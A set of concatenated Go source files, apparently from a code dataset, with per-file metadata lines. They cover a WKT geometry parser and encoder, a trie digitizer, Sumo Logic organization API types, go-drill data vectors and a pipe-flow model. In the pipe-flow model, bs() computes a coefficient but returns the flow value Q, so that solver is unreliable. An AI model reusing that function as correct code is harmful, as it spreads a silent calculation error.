pos := strings.Split(m, " ")
px := utils.Str2float(pos[0]) + float64(x)
py := utils.Str2float(pos[1]) + float64(y)
return fmt.Sprintf(`%g %g`, px, py)
}
d.draw = ShapeFilter(d.draw, move, "")
return &d
}
func (d Shape) Flip() *Shape {
flip := func(m string) string {
pos := strings.Split(m, " ")
px, py := 0-utils.Str2float(pos[0]), utils.Str2float(pos[1])
return fmt.Sprintf(`%g %g`, px, py)
}
d.draw = ShapeFilter(d.draw, flip, "")
return &d
} | draw/draw.go | 0.729134 | 0.464537 | draw.go | starcoder |
package euler
import (
"fmt"
"math"
)
const gravity = 9.8
type Ref struct {
// Relative Height [m]
Z float64
// Relative Pressure [Pa]
P float64
}
func New(r Ref, f Fluid) *Model {
p := Pipe{z: r.Z}
m := Model{pipes: []Pipe{p}, fluid: f, startP: r.P}
return &m
}
type Model struct {
startP float64
pipes []Pipe
fluid Fluid
}
func (m *Model) Connect(p ...Pipe) *Model {
m.pipes = append(m.pipes, p...)
return m
}
func (m *Model) End(P float64) (Q float64) {
pa := m.startP
za := m.first().z
zb := m.last().z
As := (P-pa)/(gravity*m.fluid.rho) + zb - za
// Pipe areas
Q = 0.01
Dq := 10.
i := 0
for math.Abs(Dq/Q) > 1e-3 && i < 1000 {
i++
Bs := m.bs(Q)
Qnew := math.Sqrt(-As / Bs)
if math.IsNaN(Qnew) {
panic("got NaN")
}
Dq = Q - Qnew
Q = Qnew
fmt.Printf("Dq=%.4g, Qnew=%g\n", Dq, Qnew)
}
return Q
}
func (m *Model) bs(Q float64) float64 {
Aa := math.Pi * m.first().d * m.first().d / 4
Ab := math.Pi * m.last().d * m.last().d / 4
// Calculate flow energy correction factor.
Rea := re(m.first().d, Q/Aa, m.fluid.mu, m.fluid.rho)
Reb := re(m.last().d, Q/Ab, m.fluid.mu, m.fluid.rho)
αa := 1.
αb := 1.
if isLaminar(Rea) {
αa = 2.
}
if isLaminar(Reb) {
αb = 2.
}
Bs := αb/(2*Ab*gravity) - αa/(2*Aa*gravity)
for _, p := range m.pipes {
A := math.Pi * p.d * p.d / 4
u := Q / A
Bs += p.l / p.d * estimateDarcy(p.d, u, p.ε, m.fluid.mu, m.fluid.rho)
}
return Q
}
func (m *Model) first() Pipe {
return m.pipes[0]
}
func (m *Model) last() Pipe {
return m.pipes[len(m.pipes)-1]
}
type Fluid struct {
// [Pa*s]
mu float64
// [kg/m^3]
rho float64
}
// Estimate darcy friction factor using a variant of Colebrook equation.
func estimateDarcy(D, U, ε, mu, rho float64) float64 {
Re := re(D, U, mu, rho)
if isLaminar(Re) {
// Laminar flow condition
return 64 / Re
}
invsqrt := -1.8 * math.Log(math.Pow(ε/(3.7*D), 1.11)+6.9/Re)
return 1 / (invsqrt * invsqrt)
}
func isLaminar(Re float64) bool {
return Re < 2600
}
// Reynolds number
func re(D, U, mu, rho float64) float64 {
return U * rho / mu * D
}
var Water20C = Fluid{
mu: 1e-3,
rho: 1e3,
} | model.go | 0.782787 | 0.412708 | model.go | starcoder |
package geom
import (
"bufio"
"bytes"
"fmt"
"io"
"strconv"
"strings"
)
const Empty = "EMPTY"
func NewGeometryFromWKT(wkt string) (*Geometry, error) {
d := &WKT{}
return d.Decode(wkt)
}
func (x *Geometry) FromWKT(wkt string) error {
if x != nil {
g, err := NewGeometryFromWKT(wkt)
if err != nil {
return err
}
x.Geometry = g.Geometry
}
return nil
}
func (x *Geometry) ToWKT() string {
enc := &WKT{}
return enc.Encode(x)
}
type WKT struct {
}
func (w *WKT) Decode(wkt string) (*Geometry, error) {
return w.decode(&reader{
Reader: bufio.NewReader(strings.NewReader(wkt)),
})
}
func (w *WKT) Encode(geometry *Geometry) string {
buffer := bytes.NewBuffer(nil)
return w.encode(buffer, geometry).string(buffer)
}
func (w *WKT) decodePoint(r *reader) (*Geometry, error) {
pts, err := r.readPoints()
if err != nil {
return nil, err
}
switch len(pts) {
case 0:
return nil, r.newError("POINT", "cannot be empty")
case 1:
p := &Geometry{}
p.SetValue(&Point{Coordinate: pts[0]})
return p, nil
default:
return nil, r.newError("POINT", "too many points %d", len(pts))
}
}
func (w *WKT) decodeMultiPoint(r *reader) (*Geometry, error) {
pts, err := r.readPoints()
if err != nil {
return nil, err
}
return NewMultiPointGeometryFrom(pts...), nil
}
func (w *WKT) decodeLineString(r *reader) (*Geometry, error) {
pts, err := r.readPoints()
if err != nil {
return nil, err
}
if len(pts) < 2 {
return nil, r.newError("LINESTRING", "not enough points %d", len(pts))
}
return NewLineStringGeometry(pts...), nil
}
func (w *WKT) decodeMultiLineString(r *reader) (*Geometry, error) {
lines, err := r.readLines()
if err != nil {
return nil, err
}
if len(lines) < 1 {
return nil, r.newError("MULTILINESTRING", "not enough lines %d", len(lines))
}
lineStrings := make([]*LineString, 0, len(lines))
for i, v := range lines {
if len(v) < 2 {
return nil, r.newError("MULTILINESTRING", "not enough points in LINESTRING[%d], %d", i, len(v))
}
lineStrings = append(lineStrings, &LineString{Coordinates: v})
}
return NewMultiLineStringGeometry(lineStrings...), nil
}
func (w *WKT) decodePolygon(r *reader) (*Geometry, error) {
lines, err := r.readLines()
if err != nil {
return nil, err
}
if len(lines) < 1 {
return nil, r.newError("POLYGON", "not enough lines %d", len(lines))
}
lineStrings := make([]*LineString, 0, len(lines))
for i, v := range lines {
n := len(v)
if n < 4 {
return nil, r.newError("POLYGON", "not enough points in linear-ring[%d], %d", i, len(v))
}
// part of the spec
if !v[0].Equal(v[n-1]) {
return nil, r.newError("POLYGON", "linear-ring[%d] not closed", i)
}
lineStrings = append(lineStrings, &LineString{Coordinates: v})
}
return NewPolygonGeometry(lineStrings...), nil
}
func (w *WKT) decodeMultiPolygon(r *reader) (*Geometry, error) {
polys, err := r.readPolys()
if err != nil {
return nil, err
}
if len(polys) < 1 {
return nil, r.newError("MULTIPOLYGON", "not enough polygons %d", len(polys))
}
polygons := make([]*Polygon, 0, len(polys))
for ii, vv := range polys {
rings := make([]*LineString, 0, len(vv))
for i, v := range vv {
n := len(v)
if n < 4 {
return nil, r.newError("MULTIPOLYGON", "not enough points in polygon[%d] linear-ring[%d], %d", ii, i, len(v))
}
// part of the spec
if !v[0].Equal(v[n-1]) {
return nil, r.newError("MULTIPOLYGON", "polygon[%d] linear-ring[%v] not closed", i, ii)
}
rings = append(rings, &LineString{Coordinates: v})
}
polygons = append(polygons, &Polygon{LineStrings: rings})
}
return NewMultiPolygonGeometry(polygons...), err
}
func (w *WKT) decodeGeometryCollection(r *reader) (*Geometry, error) {
b, err := r.pop()
if err != nil {
return nil, err
}
if b != '(' {
return nil, r.expect("(")
}
_, err = r.skipSpaces()
if err != nil {
return nil, err
}
geoms := make([]*Geometry, 0, 4)
var geo *Geometry
for b, err = r.pop(); b != ')' && err == nil; b, err = r.pop() {
r.unPop()
geo, err = w.decode(r)
if err != nil {
return nil, err
}
geoms = append(geoms, geo)
_, err = r.skipSpaces()
if err != nil {
return nil, err
}
b, err = r.pop()
if err != nil {
return nil, err
}
switch b {
case ')':
r.unPop()
case ',':
//noop
_, err = r.skipSpaces()
if err != nil {
return nil, err
}
default:
return nil, r.expect("',' or ')'")
}
}
if err != nil {
return nil, err
}
if len(geoms) < 1 {
return nil, r.newError("GEOMETRYCOLLECTION", "not enough geometries %d", len(geoms))
}
if b != ')' {
panic("unreachable")
}
return NewGeometryCollectionGeometry(geoms...), nil
}
func (w *WKT) decode(r *reader) (*Geometry, error) {
tag, err := r.readTag() // remove leading whitespaces
if err != nil {
return nil, err
}
_, err = r.skipSpaces()
if err != nil {
return nil, err
}
switch strings.ToLower(tag) {
case "point":
return w.decodePoint(r)
case "multipoint":
return w.decodeMultiPoint(r)
case "linestring":
return w.decodeLineString(r)
case "multilinestring":
return w.decodeMultiLineString(r)
case "polygon":
return w.decodePolygon(r)
case "multipolygon":
return w.decodeMultiPolygon(r)
case "geometrycollection":
return w.decodeGeometryCollection(r)
default:
return nil, r.newError("GEOMETRY", "unknown type %q", tag)
}
}
func (w *WKT) writeLngLat(buffer *bytes.Buffer, p *LngLat) *WKT {
buffer.Grow(24)
buffer.WriteString(strconv.FormatFloat(p.Longitude, 'f', -1, 64))
buffer.WriteByte(' ')
buffer.WriteString(strconv.FormatFloat(p.Latitude, 'f', -1, 64))
return w
}
func (w *WKT) writeLngLats(buffer *bytes.Buffer, points ...*LngLat) *WKT {
n := len(points)
buffer.Grow(n * 24)
buffer.WriteByte('(')
for i, p := range points {
if i > 0 {
buffer.WriteByte(',')
}
w.writeLngLat(buffer, p)
}
buffer.WriteByte(')')
return w
}
func (w *WKT) writeLines(buffer *bytes.Buffer, lines ...*LineString) *WKT {
n := len(lines)
buffer.Grow(n * 64)
buffer.WriteByte('(')
for i, line := range lines {
if i > 0 {
buffer.WriteByte(',')
}
w.writeLngLats(buffer, line.Coordinates...)
}
buffer.WriteByte(')')
return w
}
func (w *WKT) encodePoint(buffer *bytes.Buffer, p *Point) *WKT {
buffer.Grow(32)
buffer.WriteString("POINT ")
if p.GetCoordinate().IsEmpty() {
buffer.WriteString(Empty)
return w
}
buffer.WriteByte('(')
w.writeLngLat(buffer, p.Coordinate)
buffer.WriteByte(')')
return w
}
func (w *WKT) encodeMultiPoint(buffer *bytes.Buffer, multiPoint *MultiPoint) *WKT {
n := len(multiPoint.Points)
buffer.Grow(n * 24)
buffer.WriteString("MULTIPOINT ")
if n == 0 {
buffer.WriteString(Empty)
} else {
w.writeLngLats(buffer, multiPoint.GetLngLats()...)
}
return w
}
func (w *WKT) encodeLineString(buffer *bytes.Buffer, line *LineString) *WKT {
n := len(line.Coordinates)
buffer.Grow(n * 24)
buffer.WriteString("LINESTRING ")
if n == 0 {
buffer.WriteString(Empty)
} else {
w.writeLngLats(buffer, line.Coordinates...)
}
return w
}
func (w *WKT) encodeMultiLineString(buffer *bytes.Buffer, multiLineString *MultiLineString) *WKT {
n := len(multiLineString.LineStrings)
buffer.Grow(n * 64)
buffer.WriteString("MULTILINESTRING ")
if n == 0 {
buffer.WriteString(Empty)
} else {
w.writeLines(buffer, multiLineString.LineStrings...)
}
return w
}
func (w *WKT) encodePolygon(buffer *bytes.Buffer, polygon *Polygon) *WKT {
n := len(polygon.LineStrings)
buffer.Grow(n * 64)
buffer.WriteString("POLYGON ")
if n == 0 {
buffer.WriteString(Empty)
} else {
w.writeLines(buffer, polygon.LineStrings...)
}
return w
}
func (w *WKT) encodeMultiPolygon(buffer *bytes.Buffer, multiPolygon *MultiPolygon) *WKT {
n := len(multiPolygon.Polygons)
buffer.Grow(n * 256)
buffer.WriteString("MULTIPOLYGON ")
buffer.WriteByte('(')
for i, polygon := range multiPolygon.Polygons {
if i > 0 {
buffer.WriteByte(',')
}
w.writeLines(buffer, polygon.LineStrings...)
}
buffer.WriteByte(')')
return w
}
func (w *WKT) encodeGeometryCollection(buffer *bytes.Buffer, collection *GeometryCollection) *WKT {
geoms := collection.Geometries
n := len(geoms)
if n == 0 {
buffer.WriteString("GEOMETRYCOLLECTION EMPTY")
return w
}
buffer.Grow(n * 256)
buffer.WriteString("GEOMETRYCOLLECTION (")
for i, g := range geoms {
if i > 0 {
buffer.WriteByte(',')
}
w.encode(buffer, g)
}
buffer.WriteByte(')')
return w
}
func (w *WKT) encode(buffer *bytes.Buffer, geometry *Geometry) *WKT {
switch gt := geometry.Geometry.(type) {
case *Geometry_Point:
return w.encodePoint(buffer, gt.Point)
case *Geometry_MultiPoint:
return w.encodeMultiPoint(buffer, gt.MultiPoint)
case *Geometry_LineString:
return w.encodeLineString(buffer, gt.LineString)
case *Geometry_MultiLineString:
return w.encodeMultiLineString(buffer, gt.MultiLineString)
case *Geometry_Polygon:
return w.encodePolygon(buffer, gt.Polygon)
case *Geometry_MultiPolygon:
return w.encodeMultiPolygon(buffer, gt.MultiPolygon)
case *Geometry_GeometryCollection:
return w.encodeGeometryCollection(buffer, gt.GeometryCollection)
}
return w
}
func (w *WKT) string(buffer *bytes.Buffer) string {
return buffer.String()
}
type reader struct {
*bufio.Reader
row int
column int
}
func (r *reader) peek() (byte, error) {
bts, err := r.Peek(1)
if err != nil {
return ' ', err
}
return bts[0], nil
}
func (r *reader) pop() (byte, error) {
b, err := r.ReadByte()
if err == io.EOF {
return b, r.newError("UNEXPECTED", "eof")
}
if b == '\n' || b == '\r' {
r.row++
r.column = 0
} else {
r.column++
}
return b, err
}
func (r *reader) unPop() error {
r.column--
if r.column < 0 {
r.column = 0
r.row--
}
return r.UnreadByte()
}
// skipSpaces skips whitespaces and returns
// true if any characters were read
func (r *reader) skipSpaces() (bool, error) {
var b byte
var err error
var skip bool
for b, err = r.pop(); err == nil && isSpace(b); b, err = r.pop() {
skip = true
}
if err != nil {
return skip, err
}
r.unPop()
return skip, nil
}
func (r *reader) readTag() (string, error) {
var tok strings.Builder
tok.Grow(20)
var err error
var b byte
_, err = r.skipSpaces()
if err != nil {
return "", err
}
for b, err = r.pop(); isAlpha(b) && err == nil; b, err = r.pop() {
if b < 'a' {
b += 'a' - 'A'
}
tok.WriteByte(b)
}
if err != nil {
return "", err
}
r.unPop()
return tok.String(), nil
}
func (r *reader) readFloat() (float64, error) {
var tok strings.Builder
var err error
var b byte
tok.Grow(12)
for b, err = r.pop(); err == nil && isNumeric(b); b, err = r.pop() {
tok.WriteByte(b)
}
if err != nil {
return 0, err
}
r.unPop()
ret, err := strconv.ParseFloat(tok.String(), 64)
if err != nil {
return 0, r.newError("float", "cannot parse %q", tok.String())
}
return ret, nil
}
// readPoint reads a space separated tuple of floats, the inside
// of a wkt POINT
func (r *reader) readPoint() (*LngLat, error) {
lon, err := r.readFloat()
if err != nil {
return nil, err
}
skip, err := r.skipSpaces()
if err != nil {
return nil, err
}
if !skip {
return nil, r.expect("WHITESPACE")
}
lat, err := r.readFloat()
return &LngLat{
Longitude: lon,
Latitude: lat,
}, err
}
// readPoints (x y,x1 y1,...)
func (r *reader) readPoints() ([]*LngLat, error) {
b, err := r.pop()
if err != nil {
return nil, err
}
if b != '(' {
return nil, r.expect("'('")
}
_, err = r.skipSpaces()
if err != nil {
return nil, err
}
pts := make([]*LngLat, 0, 8)
for {
pt, err := r.readPoint()
if err != nil {
return nil, err
}
pts = append(pts, pt)
_, err = r.skipSpaces()
if err != nil {
return nil, err
}
b, err := r.pop()
if err != nil {
return nil, err
}
switch b {
case ',':
_, err = r.skipSpaces()
if err != nil {
return nil, err
}
continue
case ')':
return pts, nil
default:
return nil, r.expect("',' or ')'")
}
}
}
func (r *reader) readLines() ([][]*LngLat, error) {
b, err := r.pop()
if err != nil {
return nil, err
}
if b != '(' {
return nil, r.expect("(")
}
_, err = r.skipSpaces()
if err != nil {
return nil, err
}
b, err = r.pop()
if err != nil {
return nil, err
}
if b == ')' {
return nil, nil
}
r.unPop()
lines := make([][]*LngLat, 0, 4)
var pts []*LngLat
for {
pts, err = r.readPoints()
if err != nil {
return nil, err
}
lines = append(lines, pts)
_, err = r.skipSpaces()
if err != nil {
return nil, err
}
b, err = r.pop()
if err != nil {
return nil, err
}
switch b {
case ',':
_, err = r.skipSpaces()
if err != nil {
return nil, err
}
continue
case ')':
return lines, nil
default:
return nil, r.expect("',' or ')'")
}
}
}
func (r *reader) readPolys() ([][][]*LngLat, error) {
b, err := r.pop()
if err != nil {
return nil, err
}
if b != '(' {
return nil, r.expect("(")
}
_, err = r.skipSpaces()
if err != nil {
return nil, err
}
b, err = r.pop()
if err != nil {
return nil, err
}
if b == ')' {
return nil, nil
}
r.unPop()
polys := make([][][]*LngLat, 0, 4)
for {
lines, err := r.readLines()
if err != nil {
return nil, err
}
polys = append(polys, lines)
_, err = r.skipSpaces()
if err != nil {
return nil, err
}
b, err = r.pop()
if err != nil {
return nil, err
}
switch b {
case ',':
_, err = r.skipSpaces()
if err != nil {
return nil, err
}
continue
case ')':
return polys, nil
default:
return nil, r.expect("',' or ')'")
}
}
}
func (r *reader) expect(chars string) error {
r.unPop()
b, err := r.pop()
if err != nil {
// this shouldn't happen
return err
}
return r.newError(
"expect",
"one of `%q` got %q",
chars,
b,
)
}
func (r *reader) newError(typ string, format string, v ...interface{}) error {
return &parseError{
row: r.row,
char: r.column,
typ: typ,
why: fmt.Sprintf(format, v...),
}
}
type parseError struct {
row int
char int
typ string
why string
}
func (e *parseError) Error() string {
return fmt.Sprintf("syntax error at <line %d, char %d>: %s : %s", e.row+1, e.char+1, e.typ, e.why)
}
func isAlpha(b byte) bool {
return (b >= 'a' && b <= 'z') || (b >= 'A' && b <= 'Z')
}
func isNumeric(b byte) bool {
return (b >= '0' && b <= '9') ||
b == '-' ||
b == '.' ||
// b == ',' || // technically part of the spec,
// but even postgis does not support it
b == 'E'
}
func isSpace(b byte) bool {
if b == '\t' ||
b == '\n' ||
b == '\v' ||
b == '\f' ||
b == '\r' ||
b == ' ' {
return true
}
return false
} | go/pkg/mojo/geom/wkt.go | 0.78838 | 0.419588 | wkt.go | starcoder |
package trie
import "strings"
// Digitizer
type Digitizer interface {
// Base returns the base for the Digitizer.
Base() int
// IsPrefixFree returns true if and only if the Digitizer guarantees that no element is a prefix of another.
IsPrefixFree() bool
// NumDigitsOf returns the number of digits in the provided element.
NumDigitsOf(element interface{}) int
// DigitOf returns the element of digit place for the provided element.
DigitOf(element interface{}, place int) int
// FormatDigit returns a string representation of the digit in the place specified for the given element.
FormatDigit(element interface{}, place int) string
}
type stringDigitizer struct {
base int
}
// NewStringDigitizer creates a new Digitizer for strings with the provided alphabet size.
func NewStringDigitizer(alphabetSize int) Digitizer {
return &stringDigitizer{ base: alphabetSize + 1 }
}
// Base the base of the alphabet that includes the end of string character.
func (d *stringDigitizer) Base() int {
return d.base
}
// IsPrefixFree returns true since this is a prefix free digitizer.
func (d *stringDigitizer) IsPrefixFree() bool {
return true
}
// NumDigitsOf returns the number of digits in the provided string including the end of string character.
func (d *stringDigitizer) NumDigitsOf(element interface{}) int {
return len(element.(string)) + 1
}
// DigitOf returns the integer element mapped to by the digit in the given place.
func (d *stringDigitizer) DigitOf(element interface{}, place int) int {
if place >= len(element.(string)) {
return 0
} else {
return int(strings.ToLower(element.(string))[place] - 'a' + 1)
}
}
// FormatDigit returns a string representation of the digit in the place specified for the given element where '#' is
// used for the end of string character.
func (d *stringDigitizer) FormatDigit(element interface{}, place int) string {
if place >= len(element.(string)) {
return "#"
} else {
return string(strings.ToLower(element.(string))[place])
}
} | trie/digitizer.go | 0.859472 | 0.638117 | digitizer.go | starcoder |
package types
import "github.com/antihax/optional"
type Baselines struct {
// The average daily amount of continuous logs this child org is expected to ingest, in GB.
ContinuousIngest int64 `json:"continuousIngest,omitempty"`
// The average daily amount of frequent logs this child org is expected to ingest, in GB.
FrequentIngest int64 `json:"frequentIngest,omitempty"`
// The average daily amount of infrequent logs this child org is expected to ingest, in GB.
InfrequentIngest int64 `json:"infrequentIngest,omitempty"`
// The average daily amount of metrics this child org is expected to ingest, in DPMs(Data points per minute).
Metrics int64 `json:"metrics,omitempty"`
// The average daily amount of tracing data this child org is expected to ingest, in GB. This is currently not available for all customers. It will be enabled only if available for your organization. Please contact your Sumo Logic account team to learn more.
TracingIngest int64 `json:"tracingIngest,omitempty"`
}
type BasicUsage struct {
// The amount of credits used by the organization in form of deployment charge.
DeploymentChargeCreditsUsed float64 `json:"deploymentChargeCreditsUsed"`
// The amount of credits used by the organization excluding deployment charge.
AllocatedCreditsUsed float64 `json:"allocatedCreditsUsed"`
// The unique identifier of an organization. It consists of the deployment ID and the hexadecimal account ID separated by a dash `-` character.
OrgId string `json:"orgId"`
// Denotes the total number of credits provisioned for the child organization to use.
TotalCapacity float64 `json:"totalCapacity"`
// Denotes the total number of credits that have been utilized.
TotalCreditsUsed float64 `json:"totalCreditsUsed"`
}
type CreditsSubscription struct {
// Start date of the contract.
StartDate string `json:"startDate"`
// End date of the contract.
EndDate string `json:"endDate"`
// Status of the subscription.
Status string `json:"status"`
Plan *Plan `json:"plan"`
// The total number of credits allocated to the organization.
Credits int64 `json:"credits"`
// The number of credits allocated to the organization in form of deployment charge.
DeploymentChargeCredits int64 `json:"deploymentChargeCredits,omitempty"`
// The number of credits allocated to the organization excluding deployment charge.
AllocatedCredits int64 `json:"allocatedCredits,omitempty"`
Baselines *Baselines `json:"baselines"`
}
type Deployment struct {
// Identifier of the deployment.
DeploymentId string `json:"deploymentId"`
// The URL to interact with the Sumo Logic service on the corresponding deployment.
ServiceUrl string `json:"serviceUrl,omitempty"`
// URL to interact with Sumo Logic APIs on the corresponding deployment.
ApiUrl string `json:"apiUrl,omitempty"`
}
type DeploymentCharge struct {
// Identifier of the deployment for the child org for which deployment charge is applied.
DeploymentId string `json:"deploymentId,omitempty"`
// Deployment charge is a charge that applies to child orgs deployed in different regions. This number is a percentage applied to the total credits being allocated to the child org.
DeploymentCharge float64 `json:"deploymentCharge,omitempty"`
}
type DetailedUsage struct {
// The amount of credits used by the organization in form of deployment charge.
DeploymentChargeCreditsUsed float64 `json:"deploymentChargeCreditsUsed"`
// The amount of credits used by the organization excluding deployment charge.
AllocatedCreditsUsed float64 `json:"allocatedCreditsUsed"`
// Contains details of the credits used per product variable.
Usages []UsagePerProductVariable `json:"usages"`
// Denotes the total number of credits provisioned for the child organization to use.
TotalCapacity float64 `json:"totalCapacity"`
// Denotes the total number of credits that have been utilized.
TotalCreditsUsed float64 `json:"totalCreditsUsed"`
}
type ListOrganizationsOpts struct {
Limit optional.Int32
Token optional.String
Status optional.String
}
type ListOrganizationResponse struct {
// List of organizations with subscription details.
Data []ReadOrganizationResponse `json:"data"`
// Next continuation token.
Next string `json:"next,omitempty"`
}
type ListUsagesResponse struct {
// Usage details of the requested organizations.
Data []BasicUsage `json:"data"`
// Next continuation token.
Next string `json:"next,omitempty"`
}
type OrganizationsUsagesOpts struct {
Limit optional.Int32
Token optional.String
}
type OrganizationWithSubscriptionDetails struct {
// Identifier of the deployment in which the organization should be created.
DeploymentId string `json:"deploymentId"`
// Specify the duration of the Trial plan. If not specified, your subscription plan will be used for the created organization.
TrialPlanPeriod int32 `json:"trialPlanPeriod,omitempty"`
Baselines *Baselines `json:"baselines,omitempty"`
// Email address of the account owner.
Email string `json:"email"`
// Name of the organization.
OrganizationName string `json:"organizationName"`
// First name of the account owner.
FirstName string `json:"firstName"`
// Last name of the account owner.
LastName string `json:"lastName,omitempty"`
}
type ParentOrgInfo struct {
// Tells whether the parent org can set up trial child orgs subscriptions.
IsEligibleForTrialOrgs bool `json:"isEligibleForTrialOrgs,omitempty"`
// Tells whether the org is subject to deployment charges.
IsEligibleForDeploymentCharge bool `json:"isEligibleForDeploymentCharge,omitempty"`
// List of deployment charges for the customer for setting up child org in each deployment.
DeploymentCharges []DeploymentCharge `json:"deploymentCharges,omitempty"`
// Plan name of the account.
PlanName string `json:"planName,omitempty"`
}
type ParentUsage struct {
// Denotes the total number of credits that have been allocated to the child organizations.
CreditsAllocated float64 `json:"creditsAllocated"`
// Denotes the total number of credits provisioned for the child organization to use.
TotalCapacity float64 `json:"totalCapacity"`
// Denotes the total number of credits that have been utilized.
TotalCreditsUsed float64 `json:"totalCreditsUsed"`
}
type Plan struct {
// Name of the subscription plan.
PlanName string `json:"planName"`
}
type ReadOrganizationResponse struct {
Subscription *CreditsSubscription `json:"subscription"`
// The unique identifier of an organization. It consists of the deployment ID and the hexadecimal account ID separated by a dash `-` character.
OrgId string `json:"orgId"`
// Identifier of the deployment in which the organization is present.
DeploymentId string `json:"deploymentId,omitempty"`
// Email address of the account owner.
Email string `json:"email"`
// Name of the organization.
OrganizationName string `json:"organizationName"`
// First name of the account owner.
FirstName string `json:"firstName"`
// Last name of the account owner.
LastName string `json:"lastName,omitempty"`
}
type Subdomain struct {
// Subdomain login URL of the organization.
SubdomainLoginUrl string `json:"subdomainLoginUrl"`
}
type UsagePerProductVariable struct {
// A Product Variable is a unique service performance feature that is tracked through credit utilization. Valid values are 'continuousIngest', 'frequentIngest', 'storage', 'metrics', 'infrequentScan', 'infrequentIngest', 'inFrequentStorage', 'cseIngest', 'cseStorage'.
ProductVariable string `json:"productVariable"`
// Denotes the total number of actual credits that have been used.
CreditsUsed float64 `json:"creditsUsed"`
// Denotes the total number of credits that have been used in form of deployment charges.
DeploymentChargeCredits float64 `json:"deploymentChargeCredits"`
// Denotes the total number of credits that have been used including deployment charges.
CreditsDeducted float64 `json:"creditsDeducted"`
// The native utilization of the product variable.
Utilization float64 `json:"utilization"`
// The unit in which the native utilization is measured.
Unit string `json:"unit"`
} | service/cip/types/organization_types.go | 0.723016 | 0.563138 | organization_types.go | starcoder |
package data
import (
"encoding/binary"
"math"
"math/big"
"reflect"
"unsafe"
"github.com/factset/go-drill/internal/rpc/proto/common"
"github.com/factset/go-drill/internal/rpc/proto/exec/shared"
"google.golang.org/protobuf/proto"
)
//go:generate go run ../cmd/tmpl -data numeric.tmpldata vector_numeric.gen.go.tmpl type_traits_numeric.gen.go.tmpl numeric_vec_typemap.gen.go.tmpl
//go:generate go run ../cmd/tmpl -data numeric.tmpldata type_traits_numeric.gen_test.go.tmpl vector_numeric.gen_test.go.tmpl numeric_vec_typemap.gen_test.go.tmpl
type DataVector interface {
Len() int
Value(index uint) interface{}
Type() reflect.Type
TypeLen() (int64, bool)
GetRawBytes() []byte
}
type NullableDataVector interface {
DataVector
IsNull(index uint) bool
GetNullBytemap() []byte
}
type BitVector struct {
vector
values []byte
meta *shared.SerializedField
}
func (BitVector) Type() reflect.Type {
return reflect.TypeOf(bool(false))
}
func (BitVector) TypeLen() (int64, bool) {
return 0, false
}
func (b *BitVector) Len() int {
return int(b.meta.GetValueCount())
}
func (b *BitVector) Get(index uint) bool {
bt := b.values[index/8]
return bt&(1<<(index%8)) != 0
}
func (b *BitVector) Value(index uint) interface{} {
return b.Get(index)
}
func NewBitVector(data []byte, meta *shared.SerializedField) *BitVector {
return &BitVector{
vector: vector{data},
values: data,
meta: meta,
}
}
type NullableBitVector struct {
*BitVector
nullByteMap
}
func (nb *NullableBitVector) Get(index uint) *bool {
if nb.IsNull(index) {
return nil
}
return proto.Bool(nb.BitVector.Get(index))
}
func (nb *NullableBitVector) Value(index uint) interface{} {
val := nb.Get(index)
if val != nil {
return *val
}
return val
}
func NewNullableBitVector(data []byte, meta *shared.SerializedField) *NullableBitVector {
bytemap := data[:meta.GetValueCount()]
remaining := data[meta.GetValueCount():]
return &NullableBitVector{
NewBitVector(remaining, meta),
nullByteMap{bytemap},
}
}
type VarbinaryVector struct {
vector
offsets []uint32
data []byte
meta *shared.SerializedField
}
func (VarbinaryVector) Type() reflect.Type {
return reflect.TypeOf([]byte{})
}
func (VarbinaryVector) TypeLen() (int64, bool) {
return int64(math.MaxUint16), true
}
func (v *VarbinaryVector) Len() int {
return int(v.meta.GetValueCount())
}
func (v *VarbinaryVector) Get(index uint) []byte {
return v.data[v.offsets[index]:v.offsets[index+1]]
}
func (v *VarbinaryVector) Value(index uint) interface{} {
return v.Get(index)
}
func NewVarbinaryVector(data []byte, meta *shared.SerializedField) *VarbinaryVector {
if data == nil {
return &VarbinaryVector{
vector: vector{data},
offsets: []uint32{},
data: []byte{},
meta: meta,
}
}
var offsetField *shared.SerializedField
if meta.MajorType.GetMode() == common.DataMode_REQUIRED {
offsetField = meta.Child[0]
} else {
offsetField = meta.Child[1].Child[0]
}
offsetBytesSize := offsetField.GetBufferLength()
offsetBytes := data[:offsetBytesSize]
remaining := data[offsetBytesSize:]
offsetList := make([]uint32, meta.GetValueCount()+1)
for i := 0; i < len(offsetList); i++ {
offsetList[i] = binary.LittleEndian.Uint32(offsetBytes[i*4:])
}
return &VarbinaryVector{
vector: vector{data},
offsets: offsetList,
data: remaining,
meta: meta,
}
}
type VarcharVector struct {
*VarbinaryVector
}
func (VarcharVector) Type() reflect.Type {
return reflect.TypeOf(string(""))
}
func (v *VarcharVector) Get(index uint) string {
b := v.VarbinaryVector.Get(index)
return *(*string)(unsafe.Pointer(&b))
}
func NewVarcharVector(data []byte, meta *shared.SerializedField) *VarcharVector {
return &VarcharVector{NewVarbinaryVector(data, meta)}
}
type NullableVarcharVector struct {
*VarcharVector
nullByteMap
}
func (nv *NullableVarcharVector) Get(index uint) *string {
if nv.IsNull(index) {
return nil
}
b := nv.VarbinaryVector.Get(index)
return (*string)(unsafe.Pointer(&b))
}
func (nv *NullableVarcharVector) Value(index uint) interface{} {
val := nv.Get(index)
if val == nil {
return nil
}
return *val
}
func NewNullableVarcharVector(data []byte, meta *shared.SerializedField) *NullableVarcharVector {
byteMap := data[:meta.GetValueCount()]
remaining := data[meta.GetValueCount():]
return &NullableVarcharVector{
NewVarcharVector(remaining, meta),
nullByteMap{byteMap},
}
}
type DecimalVector struct {
*fixedWidthVec
traits DecimalTraits
scale int
prec int32
}
func NewDecimalVector(data []byte, meta *shared.SerializedField, traits DecimalTraits) *DecimalVector {
return &DecimalVector{
fixedWidthVec: &fixedWidthVec{data: data, valsz: traits.ByteWidth(), meta: meta},
scale: int(meta.MajorType.GetScale()),
prec: meta.MajorType.GetPrecision(),
traits: traits,
}
}
func (dv *DecimalVector) Get(index uint) *big.Float {
valbytes := dv.getval(int(index))
if !dv.traits.IsSparse() {
panic("go-drill: currently only supports decimal sparse vectors, not dense")
}
return getFloatFromBytes(valbytes, dv.traits.NumDigits(), dv.scale, dv.traits.IsSparse())
}
func (dv *DecimalVector) Value(index uint) interface{} {
return dv.Get(index)
}
type NullableDecimalVector struct {
*nullableFixedWidthVec
traits DecimalTraits
scale int
prec int32
}
func (dv *NullableDecimalVector) Get(index uint) *big.Float {
valbytes := dv.getval(int(index))
if valbytes == nil {
return nil
}
if !dv.traits.IsSparse() {
panic("go-drill: currently only supports decimal sparse vectors, not dense")
}
return getFloatFromBytes(valbytes, dv.traits.NumDigits(), dv.scale, dv.traits.IsSparse())
